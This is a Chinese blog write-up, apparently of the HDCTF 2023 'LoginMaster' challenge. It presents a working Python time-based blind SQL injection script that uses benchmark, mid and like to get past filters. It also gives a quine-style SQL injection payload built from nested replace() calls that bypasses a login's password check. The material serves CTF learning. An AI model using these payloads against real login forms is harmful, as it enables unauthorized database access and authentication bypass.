[HDCTF 2023]LoginMaster 复现 (记quine注入)

最新推荐文章于 2024-03-12 15:07:04 发布
最新推荐文章于 2024-03-12 15:07:04 发布
阅读量838 收藏 5
点赞数 3
文章标签: 数据库 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73767109/article/details/130350848
版权

 随便输入一个

说明username就是admin

用御剑或者dirmap对该端口进行扫描得

robots.txt

 得到后台源码

先是一些过滤

wp说是通过时间盲注可以知道password是空表

这里时间盲注过滤了

subst用mid绕过

VBScript Mid 函数 | 菜鸟教程 (runoob.com)

=,<,>,regexp等号可以用like代替

(1条消息) SQL 注入绕过(三)_url编码 sql_Aτθ的博客-CSDN博客

sleep可以用benchmark代替

sql时间盲注另外两种方式(benchmark,heavy query) - c1e4r - 博客园 (cnblogs.com) 

(1条消息) 自己整理MySQL盲注_时间盲注除了sleep_蜜罐小明哥的博客-CSDN博客

盲注脚本

import requests
import time

header = {
    'Host':'da41ba10-3ba9-4cfb-9326-e6f5276e4315.challenge.ctf.show',
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding':'gzip, deflate',
    'Content-Type':'application/x-www-form-urlencoded'
}  #伪装头
def find_number(cd):   #判断数据库长度
    for i in range(1,30):
        payload = "1'or/**/if(length(database())like/**/%d,benchmark(1000000000,sha(1)),1)#"%(i)
        #print(payload)
        data = {"username": 'admin',
                "password": payload
                }
        try:
            res = requests.post(url=url,data=data,timeout=2)
        except:
           print("数据库长度为:",i)
           return i
def find_all(cd,payload):
    name = ""
    for i in range(1,35):
        for j in range(31, 128):
            data = {"username": 'admin',
                    "password": payload%(i,j)
                    }
            try:
                res = requests.post(url=url, data=data, timeout=2)
            except:
                name += chr(j)
                print('所得值为: %s' % name)
                break
url="http://node4.anna.nssctf.cn:28995/"
condition="flag"
#库名:
payload = "1'/**/or/**/(if(ascii(mid(database(),%d,1))like/**/%d,benchmark(100000000,sha(1)),1))#"
#表名:
#payload="1'/**/or/**/if(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),%d,1))like%d,benchmark(100000000,sha(1)))#"
#列名:
#payload = "?id=1'/**/and/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users')from/**/%d/**/for/**/1))=%d--+"
#值:
#payload = "?id=1'/**/and/**/ascii(substr((select/**/group_concat(id,username,password)/**/from/**/users)from/**/%d/**/for/**/1))=%d--+"
#find_number(condition)#爆数据库长度
find_all(condition,payload)#爆名

 依据着提一条payload对下面爆表名和字段的payload进行修改即可得到password,但由于对服务器发送的请求运算量过大,容器容易崩,所以要一条一条来执行

得知password是空的且下面是对输入的password与数据库查询的到的password进行强对比

则就是要构造一个payload使得输入等于输出

这里介绍quine方法来绕过该匹配

quine指的是自产生程序也就是说就是输入的sql语句与要输出的一致

主要利用replace()函数

replace是将对象中的某一字符替换成另一字符并输出结果

replace(object,search,replace) 

object是要替换的对象

search是被替换的字符

replace是要替换的字符

如输入

repalce(".",char(46),".")

输出    

则输入

 repalce('repalce(".",char(46),".")',char(46),'repalce(".",char(46),".")')

则会输出

 repalce("repalce(".",char(46),".")",char(46),"repalce(".",char(46),".")")

 这样实现的是将object中的  .   换成  repalce(".",char(46),".")

但对比发现前后还有单引号和双引号不等

这时又要在repalce里面再嵌套一个replace来让双引号转成单引号

 如:

replace(replace('"."',char(34),char(39)),char(46),'.')

得:

'.'

 这里就是先执行里面的replace将"."换成了'.'然后再执行外面的repalce

所以就可以将上面'.'换成输入的内容上面就是用

replace(replace('"."',char(34),char(39)),char(46),'.')代替'.'

replace(replace('replace(replace('"."',char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace('"."',char(34),char(39)),char(46),".")') 

这样的输出就与输入一样了

具体可以看这篇博客:

(1条消息) 记录一次quine注入的学习_quine程序_Zh1A0505的博客-CSDN博客

回到题目得到的payload为

1'union/**/select/**/replace(replace('1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

要注意的是

1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#

在带入里面的replace的object时的是要把单引号换成双引号,因为这个是要被用于替换成单引号后充当外面的replace的object的单引号,即下面指的两个单引号

 最后得到flag

 

 

 

Sharpery
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 564
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
SQL注入Quine注入
Aiwin的博客
06-29 2578
SQL注入Quine注入
HSCCTF-WEB-PWD(quine注入
最新发布
m0_74855736的博客
03-12 853
思路:爆破密码,但like被过滤,因为界面显示,无论访问成功与否都是一样的,无法使用布尔盲注,时间盲注的化sleep,if,substr等函数也被禁用,该题使用一种quine注入的技巧。quine是一种计算机程序,它不接受输入并产生自己源代码的副本作为唯一的输出。里面是空表,因此需要我们的输入与最后的结果相等绕过验证,这就需要用到Quine。先将str里的双引号替换成单引号,再用str替换str里的间隔符。的双引号换成单引号,这样最后就不会出现引号不一致的情况了。中的间隔符使用双引号的原因是,
sql注入 Quine注入解析
arcuied
04-24 842
sql注入 Quine注入解析
HDCTF2023 WP
m0_68757308的博客
04-23 1136
HDCTF2023 WP
qmc.zip_Sharp_quine
09-23
Quine Mc Cluskey Algorithm in C Sharp
QM.zip_qm_quine mccluskey
09-23
quine mccluskey code for logical circut
quine-relay:具有100多种编程语言的uroboros程序
02-16
奎因继电器 这是什么 这是一个生成Rust程序的Ruby程序,该生成Rust的程序生成Scala程序,该Scala程序生成...(总共通过128种语言)。REXX程序再次生成原始Ruby代码。 (如果要查看旧的50语言版本,请参阅分支。...
q---m.zip_Quine-McClusky
09-21
quine mccluskey c++ code
qmc:Quine-McCluskey算法的CC ++实现
03-31
质量管理用法N M D M{...} D{...}N: Number of variablesM: Number of mintermsD: Number of don't-care termsM{...}: MintermsD{...}: Don't-care terms跑步gcc qmc.cpp && ./a.out
HDCTF 2023 复盘
arcuied
04-24 727
HDCTF2023 当时做了一半做不出来的题复盘
录一次quine注入的学习
Zh1A0的博客
08-24 865
录一次sql注入Quine注入的学习
题目讲解3
aetlypdlg_ys的博客
05-18 365
id等于这玩意儿是因为$_SESSION['tokennum']没有什么东西,就直接让id=md5($_SESSION['tokennum'])就行,d41d8cd98f00b204e9800998ecf8427e这一串就是$_SESSION['tokennum']的md5加密。potin1k就是绕过addslashes,构造查看ae86qfC.php的内容。1{${highlight_file( 中的1是为了满足 if (intval,只要是数字开头的字符串就会返回数字,如果是纯字符串返回0。
HDCTF 2023 复现
weixin_63231007的博客
07-11 893
web yaml反序列化&quine注入&Apache SCXML2 RCE pwn 栈迁移&格式化字符串 crypto RSA
[HDCTF2023] NSSweb方向题解
Leaf_initial的博客
05-06 1589
Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。
【NSSCTF]ctfweb题目-学习笔 1day
ZhangAweio的博客
04-16 969
今天题目类型有sql注入、getshell、XFF伪造请求头、MD5简单绕过、rec远程命令执行、[SWPUCTF 2021 新生赛]easyrce、[SWPUCTF 2021 新生赛]Do_you_know_http、[SWPUCTF 2021 新生赛]babyrce。
GDOUCTF2023 Writeup
S4n_v1的博客
04-16 1401
钝角
[鹤城杯 2021]EasyP wp(代码审计)
Leaf_initial的博客
04-11 286
变为_,所以在构造payload的时候我们可以将show_source变为show[source。正则匹配,我们不能直接输入show_source=‘’,但是由于php的特性,会将遇到的第一个。$_SERVER[‘SCRIPT_URI’] //返回当前⻚面的 URI。$_SERVER[‘PHP_SELF’] //返回当前执行脚本的文件名。被狠狠地坑了一把,这题的secret变量是个坑,受不了了。这题正确的的解题方法是:我们需要绕过正则。再介绍一个basename()该变量存在,但是由于。
LitCTF 2023 WriteUp(部分)
红叶的博客
05-17 1826
迄今为止做出来题目最多的比赛,不过嘛新生赛,加油。
quine-mccluskey method
11-30
Quine-McCluskey方法是一种用于最小化布尔函数的方法。它通过将布尔函数转换为最简化的多项式形式,以便更容易地实现或设计电路。 该方法的基本思想是使用卡诺图(Karnaugh map)的拓展版本来找到所有的重要项。首先,将布尔函数的真值表转化为卡诺图,然后根据卡诺图中的相邻位单元(最大化相邻的1)进行合并。这些合并操作可以产生更小的项,将真值表中不必要的变量进行消除,最终得到最简化的布尔表达式。 在使用Quine-McCluskey方法时,以下步骤是关键的: 1. 将布尔函数的真值表转换为卡诺图,并将1的位填入相应的格子中。 2. 找到卡诺图中所有的重要项-这些项代表着最后的布尔表达式中的主要组成部分。 3. 按照卡诺图的规则合并相邻位单元(最大化1的位数)。这些合并操作将产生更小的项,减少布尔表达式的复杂性。 4. 继续合并、消除和处理其他重要项,直到不能再进行合并操作为止。 5. 最后,根据卡诺图的结果,得到最简化的布尔表达式。 Quine-McCluskey方法是一种有效的方法,可以用于减少布尔函数的大小,并简化相应的电路设计过程。尽管手工计算非常费时且容易出错,但现代计算机系统可以自动化这一过程,使得设计人员能够更快速、准确地处理复杂的布尔函数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sharpery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值